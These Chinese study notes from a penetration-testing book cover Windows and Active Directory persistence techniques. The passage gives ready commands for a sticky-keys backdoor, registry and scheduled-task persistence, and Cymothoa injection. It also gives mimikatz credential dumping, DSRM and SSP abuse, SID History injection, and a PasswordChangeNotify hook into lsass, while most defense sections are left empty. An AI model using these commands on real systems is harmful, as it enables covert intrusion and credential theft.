前言
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章是权限维持分析及防御,分析了常见的针对操作系统后门、Web后门及域后门(白银票据、黄金票据等)的攻击手段,并给出了相应的检测和防范方法
攻击者在提升权限之后,往往会通过建立后门来维持对目标主机的控制权。这样一来,即使目标修复了漏洞,攻击者还是可以通过后门继续控制目标系统
相关知识之前也有过一些学习:
一、操作系统后门
操作系统后门,泛指绕过目标系统安全控制体系的正规用户认证过程来维持对目标系统的控制权及隐匿控制行为的方法
1、粘滞键后门
粘滞键,5次shift,其实就是命令替换,解决无法同时按多个按键的问题,如将粘滞键设置为ctrl+p,因此可以调用cmd、执行后门程序、反弹脚本等
一个简单例子如下:
cd windows\system32
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe
防范:
2、注册表注入后门
在普通用户权限下可以将后门程序或脚本路径填写到启动项注册表中,当系统管理员登录系统时触发后门
这个在ATT&CK中的Persistence一章中的Registry Run Keys / Startup Folder中有提到
命令如下:
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v RegRun /t REG_SZ /d "c:\windows\system32\calc.exe"
3、计划任务后门
计划任务在Windows7及之前使用at,在Windows8开始使用schtasks
计划任务后门分为管理员权限和普通用户权限两种
一个简单例子:
//每小时执行1次notepad
schtasks /Create /tn Updater /tr notepad.exe /sc hourly /mo 1
4、meterpreter后门
meterpreter后门,metsvc(依靠服务)和persistence(依靠启动项)
可参考:Metasploit 「控制持久化」权限维持
5、Cymothoa后门
Cymothoa是一款可以将ShellCode注入现有内存(即插进程)的后门工具
下载地址:https://sourceforge.net/projects/cymothoa/
可参考:Cymothoa后门工具
./cymothoa -s 0 -p <process id> -y <port>
安装成功后使用nc等工具连接设置的端口即可
6、WMI后门
WMI后门需要管理员权限,特征是无文件和无进程,将代码加密存储于WMI中,达到所谓的无文件。当设定的条件被满足时,系统将自动启动Powershell进程去执行后门程序,执行后进程将会消失,达到所谓的“无进程”
Empire下有WMI相关的模块可以使用
usemodule powershell/persistence/elevated/wmi
可以在目标主机中使用命令查看存在的后门
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer
清理WMI后门的方法:
二、WEB后门
WEB后门俗称WebShell
1、Nishang下的WebShell
Nishang是针对PowerShell的渗透测试工具
2、Weevely
Weevely主要功能如下:
下载地址:https://github.com/epinna/weevely3
webacoo(Web Backdoor Cookie)是针对PHP平台的Web后门工具
4、meterpreter
meterpreter中有些payload,如:
三、域控制器权限持久化
1、DSRM后门
目录服务恢复模式(Directory Services Restore Mode,DSRM)是Windows域环境中DC的安全模式启动选项
因此可以使用ntdsutil工具同步krbtgt的NTLM Hash(即修改密码),再利用注册表修改DSRM的登录方式,即可使用PTH来实现权限持久化
(1)方法
使用mimikatz查看krbtgt账户密码hash值
.\mimikatz.exe "privilege::debug" "lsadump::lsa /patch /name:krbtgt" exit
查看SAM文件中本地管理员的NTLM HASH值
.\mimikatz.exe "token::elevate" "lsadump::sam" exit
将DSRM hash和kebtgt的密码同步:
ntdsutil
set dsrm password
SYNC FROM DOMAIN account krbtgt
q
再次查看会发现DSRM密码和krbtgt的密码相同,然后修改DSRM的登陆方式,这个注册表键值为2表示"在任何情况下都可以使用DSRM管理员账号登陆域控制器":
New-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD
使用mimikatz进行pth攻击:
.\mimikatz.exe "privilege::Debug" "sekurlsa::pth /domain:DC /user:administrator /ntlm:XXXXXXXXXXX"
(2)防范
2、SSP维持域控权限
SSP(Security Support Provider)是Windows安全机制的提供者
如果获得了网络中目标机器的System权限,可以使用该方法进行持久化操作:
(1)方法一
是使用mimikatz将伪造的SSP注人内存,重启就丢失
//注销用户
.\mimikatz.exe "privilege::debug" "misc::memssp" exit
//注销之后执行命令查看明文密码
powershell.exe cat c:\windows\system32\mimilsa.log
(2)方法二
将mimikatz中的mimilib.dll放到系统的C:\Windows\System32\目录下,并将mimilib.dll添加到注册表中,重启也能持久化
powershell.exe cp .\mimilib.dll C:\Windows\System32\
Set-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "Security Packages" -value "mimilib.dll"
//重启之后使用命令查看密码
powershell.exe cat c:\windows\system32\kiwissp.log
(3)防范
3、SID History后门
每个用户都有自己的SID
如果获取了域管理员权限,可以将SID History作为实现持久化的方法
(1)方法
将Administrator的SID添加到恶意用户test的SID History属性中
打开—个具有域管理员权限的命令行窗口
//test用户的SID History属性
Import-module ActiveDirectory
Get-ADUser xiaom -Properties sidhistory
//将Administrator的SID添加到恶意用户test的SID History属性中
.\mimikatz.exe "privilege::Debug" "sid::patch" "sid::add /sam:test /new:administrator" exit
(2)防范
SID History域后门的特点:
SID History域后门的防御措施如下:
4、Golden Ticket & Silver Ticket
可参见:一文了解黄金票据和白银票据
5、Skeleton Key
Skeleton Key(万能密码)
防范:
6、Hook PasswordChangeNotify
Hook PasswordChangeNotify,当用户修改密码后在系统中进行同步,攻击者可以在此时抓取输入的明文密码
这个方法要使用Invoke-ReflectivePEInjection.ps1,工具下载地址:https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1
将HookPasswordChange.dll注入内存,在目标系统中启动管理员权限的powershell:
. .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
此时如果再修改用户密码则修改之后的密码会记录在C:\windows\Temp\password.txt文件中。
防范:
结语
一些经典的权限维持方法
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。其团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。团队现有三十多位正式成员及若干预备人员,下属联合分队数支。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有